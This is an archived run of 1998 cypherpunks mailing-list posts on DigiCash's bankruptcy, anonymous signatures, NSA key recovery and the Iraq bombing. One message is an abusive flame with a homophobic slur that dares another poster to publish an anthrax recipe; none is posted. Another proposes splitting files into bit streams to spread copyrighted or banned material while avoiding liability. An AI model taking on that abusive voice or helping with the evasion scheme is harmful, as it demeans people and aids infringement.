> here is, who came first, Freidman-egg, or cypherpunk-chickens?  The first
> edition of "The Machinery of Freedom" came out in the early 1980's, (83?,
> though somewhat-recently revised), yet Freidman leans heavily on post-mid-80's
> Chaum in his talk to Cato, and uses heretofore cypherpunk neology, like
> "anonymous remailers", "reputation capital", and the like. Not to mention
> actual citation of the list itself in reference to Brin's book about the
> hopelessness of all privacy.

"The Machinery of Freedom" far from being published in the early '80s
was published in 1971 and is based on writings from the late '60s.

It is very much aimed at 60s alternative types a with relaxed writing
style, anti-drug law and pro freedom line.

This book when I read it through FCS in the early '80s convinced me I was a 
libertarian.  I didn't come across cypherpunk theory until much 
later and, when I did, I saw it obviously followed libertarianism.

I am sure Friedman was well aware on how technological advances could
weaken the state and to accuse him of "copying" is facile.

-- 
1024/D9C69DF9 steve mynott steve@tightrope.demon.co.uk http://www.pineal.com/

one page principle:
    a specification that will not fit on one page of 8.5x11 inch
    paper cannot be understood.
        -- mark ardis




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: simya "mhendislik" <simyamuh@yahoo.com>
Date: Tue, 22 Dec 1998 14:34:07 +0800
To: Cypherpunks@toad.com
Subject: list
Message-ID: <19981222060923.10427.rocketmail@send102.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/plain



thanks!




_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 22 Dec 1998 08:04:04 +0800
To: cypherpunks@cyberpass.net
Subject: No Subject
Message-ID: <199812212120.WAA30600@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



 i   got a mail message delivered by the friendly old postal service, from
Toto.  he says he has been elected Santa Calus (aka Santa Loco) of Yucca
South CellBlock, at FCI-Tuscon but 'Santa is in The Hole (TM).'

 he is or at least was sharing a cell with a skinhead called 'reaper.' but
reaper has 'great reading material' - such as GQ magaazine - so it's 'not
as grim as it might seem.'
 
 he says he has come down with a skin condition that is still untreated by
the prison authorities.  his toto-eque notes to the prison staff on
'inmate request' forms don't seem to be helping.

  that's all.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Tue, 22 Dec 1998 15:46:07 +0800
To: Robert Hettinga <cryptography@c2.net, e$@vmeng.com
Subject: Re: DigiCash Update, part II
In-Reply-To: <v03130317b29dbeae5c0d@[209.66.101.206]>
Message-ID: <4.1.19981221212704.00935410@pop.wenet.net>
MIME-Version: 1.0
Content-Type: text/plain



I've been away for a bit, physically and otherwise, but have am back from
vacation and spent some time down at the clerk's office of the bankruptcy
court in San Jose today. Apropos to an ongoing discussion of a week or so ago -

At 07:20 PM 12/16/98 -0500, Robert Hettinga wrote:
[...]
>Of course, we'll find out the real answers to all of this when the Chapter 11
>filing is actually final. Right now, I hear that there's nothing there but
>a placeholder filing, with no actual assets listed in detail, much less
>whether they're secured by anything.

The filing is real - the court's file is up to about 400 pages, so I didn't
get the whole thing, but the schedules (including a list of assets) have
been filed. I'm in the process of digesting them into a website about the
Digicash bankruptcy. A little birdie sent me a document which is
purportedly the Dutch bankruptcy filing, and I'm looking for a translator.
Volunteers? 

According to the documents filed with the court, Digicash Inc. has assets
of $51,649, and liabilities of $3,068,076.49. The breakdown is as follows:

Real estate				$0
Personal property			$51,649
Secured claims			($123,438.09)
Unsecured priority claims	($279,500.60)
Unsecured nonpriority claims	($2,665,137.80)

Personal property includes $5,595.00 in cash, $23,220 in advance payments
on leases or security deposits, $5,750 in accounts receivable, and $17,084
in office supplies, furniture, and equipment.

Secured claims includes $73,449.56 for/secured by computer equipment,
$12,362 for/secured by a copier, and $37,626.53 for/secured by office
furniture, fittings, etc. 

Unsecured priority claims are for wages & commissions owed to employees and
independent sales agents, for amounts earned in the 90 days prior to
bankruptcy, maxing out at $4300 per person entitled to priority.

Unsecured nonpriority claims are everything else - including a bridge loan
from August Capital for $825,941.00, a bridge loan from the Glide IT Fund
for $386,325.18, legal fees of $103,756 to Gunderson Dettmer, $53,143.25 to
Netscape (apparently a software license, marked as disputed), a bridge loan
from Nicholas Negroponte for $193,735.20, legal fees of $25,103.29 to Nixon
& Vanderhyde of Washington DC (patent attorneys, who were kind enough to
file detailed legal bills with their proof of claim), a bridge loan from
Paul Van Keep of $61,698.36, legal fees of $20,635.59 to Steinhauser
Hoogenraad of the Netherlands, a bridge loan of $581,339.77 from Tech. For
Information and Entertainment III LP of Lexington MA, and a bridge loan of
$7242.35 from Thomas Little of Nashua NH. (there are also a fair number of
small to medium trade debts which I haven't listed here.) 

The IP listed as assets (but not assigned a value in the amounts shown
above) include these patents:

(all are US patents)

5,712,913	Limited-traceability systems
5,781,631	Limited-traceability systems
5,493,614	Private signature and proof systems
5,485,520	Automatic real-time highway toll collection from moving vehicles
[listed twice]
5,434,919	Compact endorsement signature systems
5,373,558	Desinated[sic]-confirmer signature systems
5,276,736	Optionally moderated transaction systems
5,131,039	Optionally moderated transaction systems
4,996,711	Selected-exponent signature systems
4,991,210	Unpredictable blind signature systems
4,987,593	One-show blind signature systems
4,949,380	Returned-value blind signature systems
4,947,430	Undeniable signature systems
4,926,480	Card-computer moderated systems
4,914,698	One-show blind signature systems
4,759,064	Blind unanticipated signature systems
4,759,063	Blind signature systems
4,529,870	Cryptographic identification, financial transaction, and
credential device

The IP list also mentions that DigiCash holds copyrights to software in the
US and abroad, without providing further detail.

Digicash holds or has filed for trademarks on the terms "DIGICASH" and
"ECASH" in the following jurisdictions: Australia, Brazil, Canada,
Switzerland, Chile, China, Costa Rica, Germany, European Community,
Finland, Israel, India, Iceland, Japan, South Korea, Mexico, Malaysia,
Norway, New Zealand, Phillipines, Singapore, Thailand, and the United
States. They have also filed for (not all are approved or registered) the
following trademarks in the US: CRYPTOPAY, CYBER DOLLAR, CYBER PAY, CYBER$,
CYBER-BUCKS, CYBER-CASH, CYBERCHEQUE, CYBERMILES, DATACOIN, DIGI$,
DIGI-CASH, DIGI-DOLLAR, DIGIBANK, DIGICASH, DIGICOIN, DIGIPAY, E$, E-CASH,
E-COIN, E-DOLLAR, E-MONEY, E-PAY, E-VOTE, ECREDIT, EGIRO, EMILES, EWIRE,
EYECASH/ICASH, FIRST DIGITAL BANK, KIDCASH, MONEY MAN, MONEY MEDIA,
NET-CASH, NET-PAY, PAY-AS-YOU-GO, TELEPAY, V-BANK, V-CASH, V-COIN, V-MONEY,
V-PAY, V-SHOP, VIRTUAL CASH, VIRTUAL COIN.

There's no discussion of foreign patents, which seems peculiar - the legal
bills from the patent attorneys included amounts for foreign associates,
with legal bills for Japanese patent matters sticking out in particular. 

As far as I can tell, Digicash Inc. (the US corp) was formed in 1990; the
Netherlands and Australian corps are/were subsidiaries of the US corp.

The filing discloses the following historical financial data -

Year		Sales
1998		$134,842
1997		$ 10,000

Year		Income
1998		$23,161 interest
1998		$ 2,580 sale of assets 
1997		$53,464 interest

The other item which may be of interest is that the IP portfolio has been
pledged as collateral for a post-filing bridge loan obtained from most of
the funders who are owed the $2M unsecured; I was hoping to trade files
with someone else (whom I haven't been able to meet with yet) so I didn't
get a copy of that filing, but I seem to remember that the postfiling
bridge loan, approved by the court, was for $330K, which will be paid back
from the proceeds of the sale of DigiCash's assets.

I'm hoping to work all of this up into a more comprehensive presentation,
but that's going to take another week or two at least.  
--
Greg Broiles
gbroiles@netbox.com
PGP: 0x26E4488C




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Mon, 21 Dec 1998 23:52:07 +0800
To: Jukka E Isosaari <ogrenivek@yahoo.com>
Subject: Re: I must admit. . .
In-Reply-To: <19981216144244.7920.rocketmail@send101.yahoomail.com>
Message-ID: <3.0.5.32.19981221234722.009bd210@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/enriched

 At 10:03 PM 12/17/98 +0200, Jukka E Isosaari wrote:
--snip--
>
>Everyone is touting how he [saddam hussein, (Reeza!)] is behind every nasty thing that the 
>Iraq does, so just kill or capture and imprison him. Don't take
>it out on all the Iraqis.

Make a martyr of him, in other words?

>Now, how's that for an alternative?

Perfectly acceptable to me personally. Please show how it will result in proving that Iraq does not, and will not in the near or forseeable future possess weapons of mass destruction that may be utilized against neighbors, foreign or domestic. Or how it will result in turning the public opinion, iraqi and/or american, touted by the biased US press in such a fashion that it would result in a munificent display of openness, agreeablility, and welcoming to the UN inspectors by the iraqi hosts. Or show how Hussein is now trustworthy, and thereby qualified by the MIB office of the USG to possess said weapons.

>But I doubt it will happen. 
>
>The UK+USA need an icon, a person to embody as THE international
>satanic terrorist threat to all civilized nations. 

I nominate SKOD.
SKOD's been around, for a long, long year,
he Stole many a man's soul and faith,,,,

any boogey man in a pinch, yes???

>Otherwise their
>current military expenditures would look ridiculously high and
>unnecessary, 

"It is a doctrine of war not to assume the enemy will not come,
but rather to rely on one's readiness to meet him..." 

--  Sun Tsu

You FOOL. 
You deserve to be subjugated. 
Don't expect me to willingly go with you. 
Don't try to take me with you,,, you will bleed.

>now that the Russians don't pose any threat. This is
>also why terrorist horror scenarios and stories are increasingly
>used to justify incredible expenditure. 

Terrorist threats are increasingly used to justify invasions of privacy, meanwhile real threats to Freedom and Primacy are neglected because all the Doves endlessly recite the litany of fatalism: The Evil Russian Empire Is Dead, Eradicate Our Own Military. 

In the face of a dovish regime, anything that will work is used to justify expenditure for the military. GET IT RIGHT.

The installed power base seeks to stabilize and solidify its possession of the reins of authority. MUSH,,, MUSH,,,, MUSH,,, I SAID MUSH,,,, <CRACCKKK>

>The military is engaged
>in creating a threat to justify their existence and continued 

EAT MY MILITARY FUCKING SHORTS YOU PUSSY FUCKWAD FAGGOT SON-OF-A-BITCH. The powers of the military are being abused by CIVILIANS who cannot fathom the true purpose of the military, think the military doesn't earn its pay. I have something for YOU to earn, you ewe you.

>economic well-being. Saddam is worth much, much more to them when
>he is alive and well in Iraq.

OH YEAH, OH YEAH, THAT is why we dropped leaflets advocating the iraqis do everything in their power to maintain their present, totalitarian regime. GET A FUCKING CLUE YOU GREASY STAIN ON THIS MAILING LIST.

>The fact, however, is that any loony Unabomber cooking some anthrax
>in his cellar in the US, would be able to harm the US more than the
>whole nation of Iraqis right now, or in the years to come. Welcome
>to Echelon and big brother surveillance justification.

OH YEAH, OH YEAH BABY, You are on a roll, tell it like it is, 
</sarcasm>


Like the good doctor in nevada who appeared on national tv TWO WHOLE FUCKING DAYS BEFORE the feds ransacked his lab, only to have their entire "just cause" falter and be riddled with inexcusable and inexplicable faults, to ultimately be thrown out for lack of evidence? 

If ANTHRAX recipes are so easily obtainable, if it is so easy to make, so easy to disseminate, and public knowledge to boot, POST IT HERE, POST IT HERE. 

24 hour time limit, IF IT IS EASY, You shouldn't have any trouble making the deadline now should you? And none of that "I don't want to give away inappropriate information" pussy shit. It is wholly relevant, not inappropriate, and will MAKE ME APOLOGIZE TO YOU AND THE LIST. 

DO IT. DO IT. DO IT, 


you make me want to vomit.

shut the fuck up and go the fuck away.

Don't try to do any good deeds for me, you Do Gooder Piece Of Shit.

BTW, Fuck You.

Reeza!



DH Key available on request


If you see a man approaching you with the obvious intention 
of doing you good, you should run for your life.

-stolen from a cypherpunk sig



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 22 Dec 1998 09:48:55 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Good archive of AES algorithms?
Message-ID: <199812220127.CAA17522@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



> Is there a good archive of all the algorithms submitted for
> AES?  I'd be interested especially in one that also had
> info on what's been broken so far, plus implementations and
> performance numbers. I can't find all this info on any one
> site, but I can't believe that one doesn't exist.

The home page for the AES is http://www.nist.gov/aes/

There is a page with current attack/break information at:
http://www.ii.uib.no/~larsr/aes.html.

Bruce Schneier et al have done performance comparisons of AES algorithms;
links to their results at http://www.counterpane.com/AES-performance.html.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 22 Dec 1998 10:23:05 +0800
To: cypherpunks@cyberpass.net
Subject: Anonymous nym ratings
Message-ID: <199812220202.DAA22604@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Back writes:
> Probably a good rule of thumb is never to sign anything and always
> post via a mixmaster chain.

Good idea!

> Some messages don't need a persistent nym
> even.  Perhaps one could construct a zero knowledge proof of nym
> reputation rating without identityfing the nym which might be useful
> for filtering without linkability.

This could be done via some of the recent work on group signatures.
Efficient methods have been developed to show that a message is signed
by a key, without revealing what the key is, but proving that the key
itself is signed by a specific other key.

Imagine an editor who only signs keys belonging to people who deserve
to get through filters.  Call this "endorsing" a key.  If you respect
that editor, you set your filters to let messages through which are by
keys he has endorsed in this manner.  Now, people can submit messages
anonymously, but in such a way that they are provably written by an
endorsed key, without revealing which key it is.

The protocols are reasonably efficient, with signature verification taking
about 20 times longer than a regular DSS signature.  However the methods
involve blind signatures, and hence would infringe upon Chaum's patent.

The group signature was described at Crypto 97; an extension for blind
group signatures at Asiacrypt 98; and more work will be presented at
FC 99.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jukka E Isosaari <jei@zor.hut.fi>
Date: Tue, 22 Dec 1998 12:32:31 +0800
To: Reeza! <howree@cable.navy.mil>
Subject: Re: I must admit. . .
In-Reply-To: <3.0.5.32.19981221234722.009bd210@205.83.192.13>
Message-ID: <Pine.LNX.3.96.981222043216.20746B-100000@zor.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 21 Dec 1998, Reeza! wrote:

> At 10:03 PM 12/17/98 +0200, Jukka E Isosaari wrote:
> --snip--
> >Everyone is touting how he [saddam hussein, (Reeza!)] is behind every
> >nasty thing that the Iraq does, so just kill or capture and imprison
> >him. Don't take it out on all the Iraqis. 
>
> Make a martyr of him, in other words?
> 
> >Now, how's that for an alternative?
> 
> Perfectly acceptable to me personally. Please show how it will result in
> proving that Iraq does not, and will not in the near or forseeable future
> possess weapons of mass destruction that may be utilized against
> neighbors, foreign or domestic. Or how it will result in turning the
> public opinion, iraqi and/or american, touted by the biased US press in
> such a fashion that it would result in a munificent display of openness,
> agreeablility, and welcoming to the UN inspectors by the iraqi hosts. Or
> show how Hussein is now trustworthy, and thereby qualified by the MIB
> office of the USG to possess said weapons.

It won't. But please show how bombing the shit out of all the Iraqis will
accomplish this either? I would imagine getting rid of the lunatic leader
and establishing a civilized democracy with human rights in place, would
result in a state that would not be as prone to be as aggressive or
inclined to use weapons of mass destruction. Or isn't that the ultimate
goal?

But you are right, I must admit, that not *all* democracies are
non-aggressive, with USA coming to mind as an example. It seems that
rotten people with no moral values at the top, result in aggressive
foreign policies, no matter what the nation.

The bombing will only result in creating more frustrated individuals with
personal vendettas against the US. (People with dead children/wives, etc.)

With your logic, the US is on a road to kill every non-american on this
planet, in order to ensure their own safety. 

Actually, this has been evident quite some time in the US foreign policy: 
The *only* lives that matter are the American ones. It is also very evident
in the US film industry (national propaganda/brainwashing machine). Just
how many war movies have you seen where the US special-forces squads
venture into the vietnam/arabs and kill hundreds or thousands of people in
order to save a few US prisoners? Try thinking that in reverse, an Arab
squad coming into the US, and killing hundreds of US citizens to save a few
arabs, for a change. Seeing a few movies like that would do some good to a
lot of americans in restoring their respect for universal human life. 

Anyway, the point I am trying to make in this, is that the americans don't
in general seem to put any value on human life, *unless* it is an american.
This is evident everywhere: in their film industry, their foreign politics,
and even Bill Gates' donation policies. It seems to be a fact ever more
blatant. 

Anyone else notice this?

> >The military is engaged
> >in creating a threat to justify their existence and continued 
>
> EAT MY MILITARY FUCKING SHORTS YOU PUSSY FUCKWAD FAGGOT SON-OF-A-BITCH.
> The powers of the military are being abused by CIVILIANS who cannot
> fathom the true purpose of the military, think the military doesn't earn
> its pay. I have something for YOU to earn, you ewe you.
> 
> >economic well-being. Saddam is worth much, much more to them when
> >he is alive and well in Iraq.
> 
> OH YEAH, OH YEAH, THAT is why we dropped leaflets advocating the iraqis
> do everything in their power to maintain their present, totalitarian
> regime. GET A FUCKING CLUE YOU GREASY STAIN ON THIS MAILING LIST.

Did I hit a nerve or something?

Usually people resort to name-calling only when feeling badly inferior
or in lack of any real facts to represent in defence of their case,
and in general this justifies the strong doubt that the person in
question is in fact a juvenile.

I'm sorry, but I won't waste my time on blathering kids like you. 

(Please note: I've Cc:ed the root at your site, as you appear to be so
childish, and I wouldn't know what a child is doing with a .mil account,
so you must be using your parent's account or a hacked account,
both of which are in general very much against the rules..

Or, in the unlikely case that you are actually an adult, please consider
this as an exemplary sample of Mr Zeebra's skills in delivering verbal
attacks in defence of his country. Surely you recognize his superiors
language skills and the qualifications he has for the assignation to the
national ultra secret verbal cyber-warfare attack squad, designed to
destroy the egos and PCs of all those who have not bought in to the US
military propaganda.)

In any case, I realize this is the wrong list for this discussion. 
Please continue in private, like a good netbaby, if you feel like
more name-calling. I've already added you to my filters.

++ J

> >The fact, however, is that any loony Unabomber cooking some anthrax
> >in his cellar in the US, would be able to harm the US more than the
> >whole nation of Iraqis right now, or in the years to come. Welcome
> >to Echelon and big brother surveillance justification.
> 
> OH YEAH, OH YEAH BABY, You are on a roll, tell it like it is, 
> 
> <</sarcasm>
> 
> Like the good doctor in nevada who appeared on national tv TWO WHOLE
> FUCKING DAYS <bold><underline>BEFORE</underline></bold> the feds
> ransacked his lab, only to have their entire "just cause" falter and be
> riddled with inexcusable and inexplicable faults, to ultimately be thrown
> out for lack of evidence? 
> 
> If ANTHRAX recipes are so easily obtainable, if it is so easy to make, so
> easy to disseminate, and public knowledge to boot, POST IT HERE, POST IT
> HERE. 
> 
> 24 hour time limit, IF IT IS EASY, You shouldn't have any trouble making
> the deadline now should you? And none of that "I don't want to give away
> inappropriate information" pussy shit. It is wholly relevant, not
> inappropriate, and will MAKE ME APOLOGIZE TO YOU AND THE LIST. 
>
> DO IT. DO IT. DO IT, 
> you make me want to vomit.
> 
> 
> shut the fuck up and go the fuck away.
> 
> 
> Don't try to do any good deeds for me, you Do Gooder Piece Of Shit.
> 
> 
> BTW, Fuck You.
> 
> 
> Reeza!
> 
> 
> 
> 
> DH Key available on request
> 
> 
> 
> 	If you see a man approaching you with the obvious intention 
> 
> 	of doing you good, you should run for your life.
> 
> 
> 				-stolen from a cypherpunk sig
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jukka E Isosaari <jei@zor.hut.fi>
Date: Tue, 22 Dec 1998 13:22:39 +0800
To: root@cable.navy.mil
Subject: [ISN] Need help keeping your company's mail respectable?   (fwd)
Message-ID: <Pine.LNX.3.96.981222065500.20746H-100000@zor.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain



Thought some people might be in need of a tool like this...

++ J
---------- Forwarded message ----------
Date: Mon, 21 Dec 1998 13:32:59 -0700 (MST)
From: mea culpa <jericho@dimensional.com>
To: InfoSec News <isn@repsec.com>
Subject: [ISN] Need help keeping your company's mail respectable?  



Need help keeping your company's mail respectable? 
http://www8.zdnet.com/pcweek/stories/news/0,4153,364134,00.html
By Christy Walker, PC Week Online
October 26, 1998 9:00 AM ET
   
IT managers looking to clean up their companies' e-mail and enforce
corporate e-mail policies can get help from several software developers. 
   
New releases due soon from Worldtalk Corp., SRA International Inc. and
Content Technologies Inc.  will augment the basic management capabilities
found in mainstream e-mail packages such as Lotus Notes and Microsoft
Exchange, adding features such as content control, archiving, security and
virus scanning. 
   
Worldtalk, of Santa Clara, Calif., early next year will roll out an
upgrade of its WorldSecure Server that will allow users to control e-mail
content, scan for viruses and enforce archive policies on internal
messages as well as messages moving between the company and the public
Internet. 
   
The new release, Version 4.0, will monitor mail moving across the internal
network. The current version, 3.2, sits at the gateway level and only
scans messages between the company and the Internet. 
   
Another tool, Assentor, from SRA, uses a natural language search engine to
automate the scanning of e-mail messages for inappropriate content. 
   
Assentor 1.2, which is due by early next year, will include the ability to
route messages based on the word patterns found in an e-mail message.
Version 1.2 will also be able to look for specific word patterns based on
the requirements of individual groups, said officials of the Fairfax, Va.,
company. 
   
Assentor is widely used by securities companies that are required by the
Securities and Exchange Commission to closely monitor e-mail and other
client communications. The product helps reduce the numbers of messages
that branch managers and compliance officers must review, SRA officials
said. 
   
Assentor uses MIMEsweeper, e-mail scanning software from Content Technologies.
   
Content Technologies, meanwhile, plans to boost MIMEsweeper with the
ability to deal with encryption. Version 4.0, due early next year, will
support message decryption so that MIMEsweeper can scan encrypted messages
for content such as viruses, said officials at the Kirkland, Wash.,
company. 
   
In addition, Content Technologies will roll out a MIMEsweeper add-on
module next month that scans both inbound and outbound messages for
offensive language. 



-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Repent Security Incorporated [www.repsec.com]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 22 Dec 1998 21:47:47 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: MCI hit with encryption virus [CNN]
Message-ID: <199812221331.HAA06688@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> X-within-URL: http://cnnfn.com/digitaljam/9812/21/virus_pkg/

>    From Correspondent Bruce Francis
>    December 21, 1998: 7:56 p.m. ET

>    July 30, 1998 Network Associates MCI WorldCom More Quotes.... Network
>    Associates Anti-virus Research Center   NEW YORK (CNNfn) - Employees
>    at MCI WorldCom were confronted with a science fiction scenario made
>    cold fact on Monday when a computer virus struck the company's
>    sprawling network, encrypting and destroying files.
>    [INLINE] To make things worse, virus consultants Network Associates
>    (NETA) say that the virus -- called "Remote Explorer" -- is unlike
>    any other and may be the smartest, most dangerous computer bug to
>    date.

[text deleted]


    ____________________________________________________________________

          What raises the standard of living may well diminish the
          quality of life.

                                                 The Club of Rome

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: FitugMix <tonne@thur.de>
Date: Tue, 22 Dec 1998 17:17:32 +0800
To: cypherpunks@cyberpass.net
Subject: distribution scheme
Message-ID: <199812220853.JAA16038@jengate.thur.de>
MIME-Version: 1.0
Content-Type: text/plain



I'd like to request your comments on the following idea. code for this is ready, awaiting yours and some other people's comments regarding some of the non-coding issues.
for example, I'd like a lawyer or someone else familiar with the law to comment on the legal aspects. also, cryptologic
expertise would be great. however, this is NOT an encryption scheme. the goals are different ones, I'll talk about that in a second.

the basic idea is to take a piece of information and chop it into a number of pieces. this is basically the reverse process of "take the first letter of every word".
digital information, however, can be divided at an even lower level, the bit level. imagine to chop a file into 8 parts, with the top bit of every byte going into the first
file, the second bit into the second and so on. as you can imagine, the first 8 top-bits will again form a byte in the first file.
now imagine the same principle, with an *arbitrary* number of files.

the goal of this is not a new encryption scheme. cryptological, my limited knowledge tells me this is not too bad, but far from "secure". the nice things are that the files
themselves contain no information about how many total files there are and in which order they have to be re-assembled, and without that knowledge you are in for some
work of cryptoanalysis.
the idea is to provide for a channel of distribution of arbitrary material, even copyrighted, patented or illegal in your country (e.g. china) in a "legal" way. that's why
I'd like legal advice on this - is the idea correct? I cannot be sued for distributing a couple hundred E's and A's because they are part of a copyrighted book. can
I be sued for distributing a couple of bits from a copyrighted image file? a trademarked or patented document? are there any legal precedents? I know that in the case
of encryption, courts have at least once ruled that distribution of the key that unlocks this is equivalent to distribution of the copyrighted material, but in this case
there is no key, no single piece of information that contains anything "central".

tell me what you think. I can post code or details if you want.



Falcon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 23 Dec 1998 03:14:18 +0800
To: cypherpunks@Algebra.COM
Subject: Re: politically correct bomb graffiti
In-Reply-To: <199812221723.SAA13248@replay.com>
Message-ID: <v03130303b2a598c79ade@[209.66.100.92]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:23 AM -0800 12/22/98, Anonymous wrote:

> Pentagon Decries U.S. Bomb Graffiti
>Tuesday, December 22, 1998; 1:24 a.m. EST
>

>The bomb bore several inscriptions, including one that said, ``Here's a
>Ramadan present from Chad Rickenberg.''
>
>``Department of Defense officials were distressed to learn of thoughtless
>graffiti mentioning the holy month of Ramadan written on a piece of U.S.
>ordnance during Operation Desert Fox'' in Iraq, chief Pentagon spokesman
>Kenneth Bacon said in a statement.


But of course. How else could it be?

It is OK to kill people, but not OK to hurt their feelings.


(BTW, the military has bowed to pressures from Jesse Jackson and the
Rainbow Coalition. "Black Operations" have been renamed "Operations of
Color.")

--Tim May

We would go to their homes, and we'd kill their wives and
their children. We would kill their families
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "X" <xasper8d@lobo.net>
Date: Wed, 23 Dec 1998 02:44:17 +0800
To: "Anonymous" <cypherpunks@toad.com>
Subject: RE: politically correct bomb graffiti
In-Reply-To: <199812221723.SAA13248@replay.com>
Message-ID: <000701be2dd4$89fb0a40$03000004@ibm>
MIME-Version: 1.0
Content-Type: text/plain



~>  Pentagon Decries U.S. Bomb Graffiti
~> Tuesday, December 22, 1998; 1:24 a.m. EST
~>
~> WASHINGTON (AP) -- Defense Department officials said Monday they were
~> distressed about ``thoughtless graffiti'' referring to the Islamic holy
~> month of Ramadan on a Navy bomb being prepared for dropping on Iraq.

What's the 90's PC war cry?  Go ahead and nuke 'em, just don't be
insensitive about it.

How much will it cost U.S. taxpayers when the US Navy and Pentagon duke it
out over freedom of religion vs. freedom of speech?

I personally am offended by grey, so I'll kindly request that any bombs
thrown at me be painted in a primary color.  Anyone else?

X




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Wed, 23 Dec 1998 03:22:11 +0800
To: cypherpunks@cyberpass.net
Subject: RE: politically correct bomb graffiti
Message-ID: <367FEC2E.DC94D311@acm.org>
MIME-Version: 1.0
Content-Type: text/plain



~> WASHINGTON (AP) -- Defense Department officials said Monday they were
~> distressed about ``thoughtless graffiti'' referring to the Islamic holy
~> month of Ramadan on a Navy bomb being prepared for dropping on Iraq.

xasper8d writes:
> What's the 90's PC war cry?  Go ahead and nuke 'em, just don't be
> insensitive about it.

While I also would be more offended by someone bombing me into a
thin film of viscera and connective tissue than by having them
ridicule my beliefs, I think the Pentagon was more concerned about
the effect on our allies in the Gulf.  The recent bombing was an
attack against the Iraqi military and leadership rather than on
Islam, and having that graffito get big airplay could offend other
countries that we'd prefer not to offend.  So while they looked
silly complaining about the Ramadan reference, they'd have looked
worse if they'd passed it off with a shrug and/or another ethnic
or religious slur.

There is of course a long tradition of personalizing ordnance; ISTR
that the bomb in Dr. Strangelove had more of a message than just its
megatonnage.
-- 
	Jim Gillogly
	Sterday, 2 Yule S.R. 1999, 18:50
	12.19.5.14.5, 11 Chicchan 18 Mac, Sixth Lord of Night




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jukka E Isosaari <jei@zor.hut.fi>
Date: Tue, 22 Dec 1998 18:16:16 +0800
To: cypherpunks@toad.com
Subject: The long, strong arm of the NSA (fwd)
Message-ID: <Pine.LNX.3.96.981222112157.22374F-100000@zor.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain



http://cnn.com/TECH/computing/9807/27/security.idg/index.html

The long, strong arm of the NSA 

July 27, 1998
Web posted at: 4:15 PM EDT 

by Ellen Messmer 


FORT MEADE, Maryland (IDG) -- Back in the days of the cold war, Washington
insiders used to joke that NSA stood for "No Such Agency."  The government
denied the very existence of this group, which is dedicated to intercepting
and decoding foreign communications.

That was then. Today the National Security Agency is well known, and spends
a lot of time leaning on software, switch and router vendors, pushing them
to re-tool their products. The agency's goal: to ensure that the government
has access to encrypted data.

The industry is facing a year-end deadline to add a government-approved
back door into network gear. Vendors that don't provide this access risk
losing export privileges.

Cruising up and down Silicon Valley, NSA spooks from the agency's Fort
Meade headquarters have been making pit stops at companies ranging from
industry leaders Netscape Communications Corp. and Sun Microsystems, Inc.
to start-ups such as VPNet Technologies, Inc. in order to get a peek at
products still on the drawing board.

The NSA wants software vendors to make sure that any product with strong
encryption have some way for the government to tap into the data. And
because practically every commercial network application, router or switch
these days includes encryption or an option for it, almost every vendor now
has to answer to the NSA if it wants to export. 

Hot line to the NSA

It's gotten to the point where no vendor hip to the NSA's power will even
start building products without checking in with Fort Meade first. This
includes even that supposed ruler of the software universe, Microsoft Corp.
"It's inevitable that you design products with specific [encryption]
algorithms and key lengths in mind," said Ira Rubenstein, Microsoft
attorney and a top lieutenant to Bill Gates. By his own account, Rubenstein
acts as a "filter" between the NSA and Microsoft's design teams in Redmond,
Wash. "Any time that you're developing a new product, you will be working
closely with the NSA," he noted.

When it comes to encryption, it's widely known that a 40-bit encryption key
is easily breakable and hence rather useless. Until not long ago, this is
what the U.S. government allowed for the export of software. 

But the Clinton administration a year and a half ago said it would allow
the export of products with stronger encryption keys by any vendor that
agreed to add a "key-recovery" feature to its products by year-end - giving
the government access to encrypted data without the end user's knowledge.

According to Bill Reinsche, Department of Commerce undersecretary for the
Bureau of Export Controls, about 50 vendors have submitted plans for
government-approved key-recovery, also called data-recovery. These
companies, which include IBM, were rewarded with Key Management
